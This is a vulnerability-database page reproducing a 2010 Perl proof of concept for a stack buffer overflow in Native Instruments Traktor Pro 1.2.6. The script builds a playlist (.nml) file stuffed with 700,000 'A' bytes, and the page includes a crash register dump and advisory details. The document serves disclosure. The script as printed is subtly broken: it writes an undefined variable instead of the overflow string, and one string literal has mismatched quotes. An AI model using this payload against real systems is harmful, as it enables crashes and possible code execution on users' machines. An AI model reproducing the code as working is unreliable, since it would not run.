Vulners
Lucene search
Native Instruments Traktor Pro 1.2.6 Stack-based Buffer Overflow Vulnerability
<html><body><p>#!/usr/local/bin/perl
#
#
# Native Instruments Traktor Pro 1.2.6 Stack-based Buffer Overflow Vulnerability
#
#
# Vendor: Native Instruments GmbH
# Product web page: http://www.native-instruments.com
# Affected version: 1.2.6.8491 (Standalone)
#
# Summary: TRAKTOR PRO is the new benchmark in DJ software. Mix digital files
# on four decks, using the high-quality internal mixer or external hardware,
# and the best effects suite around. Fully primed for professional use, TRAKTOR
# PRO redefines the art of DJing.
#
# Desc: Traktor Pro suffers from a stack buffer overflow vulnerability when
# parsing playlist files (.nml) resulting in a crash. The user input is not
# properly sanitized which may give the attackers the possibility for an
# arbitrary code execution on the affected system. Failure of exploitation
# may result in a denial of service.
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
#
# -------------------------------------------------------------------
#
# (4418.4608): Stack overflow - code c00000fd (first/second chance not available)
# eax=14250000 ebx=001cc168 ecx=00000007 edx=7c90e514 esi=001cc140 edi=001cc198
# eip=7c90e514 esp=0ff5e4e4 ebp=0ff5e4f4 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
# ntdll!KiFastSystemCallRet:
# 7c90e514 c3 ret
#
# -------------------------------------------------------------------
#
#
# Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
#
# Zero Science Lab - http://www.zeroscience.mk
#
# Advisory ID: ZSL-2010-4977
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4977.php
#
# 09.11.2010
#
use strict;
print qq{
-------------------------------------------------------------------------
| |
| Native Instruments Traktor 1.2.6 Stack Overflow PoC |
| |
| Copyleft (c) 2010, Zero Science Lab |
| |
-------------------------------------------------------------------------
};
my $bof = "\x41" x 700000;
my $start = '<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<nml version="14">
<musicfolders></musicfolders>
<collection entries="2"><entry artist="Paulseq" audio_id="AGYAAjFQQiQFFCFAQSMVBCIwUDISBBXf/rhv/6/609/979uF//v/nD3/zf24X/+v+tPf/N/bhf/6/61Z/839uG//r/rE3/zf24b/+v+tTf/t/ahv/6/6xN/939uF//r/rUn/3f25b+/P+dTf79/Llv79/51M//38qV//3/nU3//vy5b+/v+dTf79/Llv/8/51N//39qW//3/rUz//f2pX/+/+tTP/9/blv/8/61M//782W/vv/nUz+/fy5b9/v+dTP78/alf/9/51M/v38uW/v7/rUz+/fypX//P+cS/7s/qlP/6/61L/9z+qU//r/nEv/y/6WP/x/94Ru7CEAAAAA==" modified_date="2008/11/18" modified_time="46610" title="Demo 1"><location dir="/:" file="Demo 1.mp3" volume=""></location>
<info bitrate="193000" coverartid="063\5RHVNTDZ5QGUQCJSQT2SAIRKVFNA" filesize="2488" flags="2" import_date="2008/11/18" last_played="2008/11/5" playcount="6" playtime="101" ranking="0"></info>
<tempo bpm="126.200249" bpm_quality="100"></tempo>
<loudness peak_db="-0.766197324" perceived_db="0.94946605"></loudness>
<cue_v2 displ_order="0" hotcue="0" len="0" name="AutoGrid" repeats="-1" start="671.08913429252357" type="4"></cue_v2>
<cue_v2 displ_order="0" hotcue="1" len="1901.7395166612771" name="n.n." repeats="-1" start="66299.022459106593" type="5"></cue_v2>
</entry>
<entry audio_id="AE0AAAbzv4bJPNhuR+po5a51uDzHXUbaeMKuhYdnVl+H3Inln6bba9hvhtt55o62yWvpbnjreseflslr2G5n+4rWnobaa9duZ/tpxZ+12WzIf3fq37Wepuhs2X1n22vGnpXXa7d+Z/t71q2m+my3fWj6a8autth+6I536mu3rYXXfciPaPptxnRk+K63jWr7bbjeluietp1r+Vy3zqbmnsmve/ltp92m14/HnHvabbjehueep6x762yY7Zf4lVWcbOpup9yWx6+3z3vpXJjbh9evprx82W6o3If3r6a7fPpdiOyI6K+lzHzZXYfth+avptyIZ01BAAAAAAAAAAAAAA==" modified_date="2008/9/9" modified_time="56472" my="" title="Demo 2">";
my $end = '<location dir="/:" file="Demo 2.mp3" volume=""></location>
<info bitrate="194000" coverartid="006\GEUNGXABSHRWRDW2UGHKAKQUYRVD" filesize="1903" import_date="2008/9/9" playcount="6" playtime="76" ranking="0"></info>
<tempo bpm="119" bpm_quality="100"></tempo>
<loudness peak_db="-0.257283062" perceived_db="3.40946603"></loudness>
<cue_v2 displ_order="0" hotcue="2" len="0" name="AutoGrid" repeats="-1" start="797.66281512605042" type="4"></cue_v2>
<cue_v2 displ_order="0" hotcue="0" len="0" name="Beginning" repeats="-1" start="797.66281512605042" type="0"></cue_v2>
<cue_v2 displ_order="0" hotcue="1" len="2016.8067226890755" name="Loop1" repeats="-1" start="41133.797268907569" type="5"></cue_v2>
</entry>
</collection>
<playlists><node name="$ROOT" type="FOLDER"><subnodes count="3"><node name="Demo Tracks" type="PLAYLIST"><playlist entries="2" type="LIST"><entry><primarykey key="/:Demo 2.mp3" type="TRACK"></primarykey>
</entry>
<entry><primarykey key="/:Demo 1.mp3" type="TRACK"></primarykey>
</entry>
</playlist>
</node>
<node name="Preparation" type="PLAYLIST"><playlist entries="0" type="LIST"></playlist>
</node>
<node name="_RECORDINGS" type="PLAYLIST"><playlist entries="0" type="LIST"></playlist>
</node>
</subnodes>
</node>
</playlists>
</nml>';
my $file = "PoC.nml";
print "\n\n[*] Creating $file playlist file...\n";
open nml, ">./$file" || die "\nCan't open $file: $!";
print nml $start.$traktor.$end;
print "\n[.] File successfully buffered!\n\n";
close nml;
</p></body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Nov 2010 00:00Current
6.5Medium risk
Vulners AI Score6.5